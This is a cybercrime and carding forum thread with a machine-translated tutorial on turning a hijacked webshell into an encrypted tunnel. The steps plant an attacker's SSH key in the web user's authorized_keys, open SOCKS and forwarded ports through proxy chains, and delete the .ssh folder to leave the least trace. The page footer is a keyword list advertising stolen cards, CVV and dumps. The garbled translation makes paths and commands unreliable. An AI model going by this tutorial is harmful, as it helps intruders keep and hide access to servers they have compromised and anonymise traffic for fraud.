If you have any questions, contact us:
Telegram:maintex
ICQ:1607000

  #1 Old 05-22-2015, 02:41 PM
Newer
 
Newer's Avatar
 
Join Date: May 2015
Posts: 61
Newer is on a distinguished road
Default Create VPN of webshell

OpenSSH is able to arrange this through the tun vpn interface. (ssh -w)

On this topic can be found in Google. To solve practical problems, we are not interested, as
1) requires a minimum of ruta to configure the device tun
2) is disabled by default
3) significantly
4) is unnecessary, except for some very specific tasks.
Doing vpn, I mean that we get a proxy encrypted tunnel - exactly what you want from the "real" vpn for our problem (direct - as opposed to the reverse. Proxy before and after webshell can and should be used).

So, we have a common webshell. The path to the console we are blocking two problems:
our user (nobody) password is not set. In etc / shadow stated something like nobody: *: 14069: 0: 99999: 7 :::
or nobody: !!: 14069: 0: 99999: 7 :::. To change the password, you must specify the old password, the password change as a result is not possible.
our user specified shell / sbin / nologin or an analogue thereof, and all modern Unices require a password to change the shell.
The first problem we avoid using public key authentication, and the second is not a problem at all, because for the tunnel shell is not needed.

Dependencies:
/ etc / ssh / sshd_config with the default settings, as follows:
parameter is not specified AllowUsers in / etc / ssh / sshd_conf (by default in the config file is not present)
AllowTcpForwarding yes or commented out (default is commented out)
RSAAuthentication yes or commented out (default is commented out)
PubkeyAuthentication yes or commented out (default is commented out)
AuthorizedKeysFile within the home folder (default is commented out and is .ssh / authorized_keys)
write access to the home directory
on some hosts the home directory read-only, and you can write only in public_html. These hosts are not suitable.
$ Local command
$ Command on the remote host
Create in a pair of secret / public keys:
$ Ssh-keygen -t rsa
Take the id_rsa.pub file and fill it in ~ / .ssh /, renamed in authorized_keys
Affix the correct permissions
$ Chmod 755 ~ / .ssh
$ Chmod go-rwXx ~ / .ssh / authorized_keys
Connect and get soks5 host on port 31337
$ Ssh [email protected] -D 31337 -N
or ... use additional Socks5 after vebshella - "External Socks5" in the picture
$ Ssh [email protected] -L 31337: externalsocks.com: 1080 -N
socks ... or use both before and after vebshella:
$ Ssh [email protected] -L 31337: externalsocks.com: 1080 -N -o ProxyCommand = "connect -S internalsocks.net:1080% h% p"
link to connect.c.
proxy ... before and after vebshella, the alternative, with the support of the chains:
$ Proxychains ssh [email protected] -L 31337: externalsocks.com: 1080 -N
link to proxychains, proxy defined in the config
You can use a pair of keys from external media - it points the way to the secret key in the parameter
-i / mnt / secure_fs / id_rsa

After the tunnel rose, you can delete the folder .ssh, if you do not plan to use the tunnel on a regular basis. So you leave the least trace.
In the process will be the following code:
root 13768 0.0 2.1 10052 2804? Ss 16:32 0:00 sshd: nobody [priv]
nobody 13774 0.0 1.0 10052 1408? S 16:32 0:00 sshd: nobody
who and last your connection not display

Plus:
+ minimum setting - has filled key, raised tunnel used, threw.
+ modest presence processes to change the external and internal socks do not need access to vebshellu - tunnel restart locally.
+ No open ports if you use a proxy to webshell does not know who are you. You can organize the tunnel even when Safe_mode = ON

Minus:
- in /.var / log / secure entry remains that the user nobody Login with such and such address.

Sometimes do not have access write to the home directory.
Newer is offline   Reply With Quote
  #2 Old 06-10-2015, 11:25 AM
harryflow
 
harryflow's Avatar
 
Join Date: Jun 2015
Posts: 4
harryflow is an unknown quantity at this point
Default

I like that
harryflow is offline   Reply With Quote
  #3 Old 01-10-2022, 10:35 PM
Saymer
 
Saymer's Avatar
 
Join Date: Sep 2013
Posts: 39
Saymer is an unknown quantity at this point
Default

good tut
Saymer is offline   Reply With Quote
Reply

Thread Tools Search this Thread
Search this Thread:

Advanced Search

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump


Cybercrime forum, cybercrime site, ,fraud forum, russian fraud forum, Credit cards, carder, infraud, carders.ws, crdpro, fraudsters, darkpro, crdcrew, dumps, cvv, cc, stuff carding, legit seller, vendor, free cvv, dumps+pin, skimmer, ,shimmer, emv software, emv chip writer, free cc+cvv, valid cards, track 2, free cvv, dump pin, dumps, cvv, cc, credit cards, real carding, legit vendor, carder forum, carding tutorial, russian hackers, online cvv shop, track 101, enroll, fullz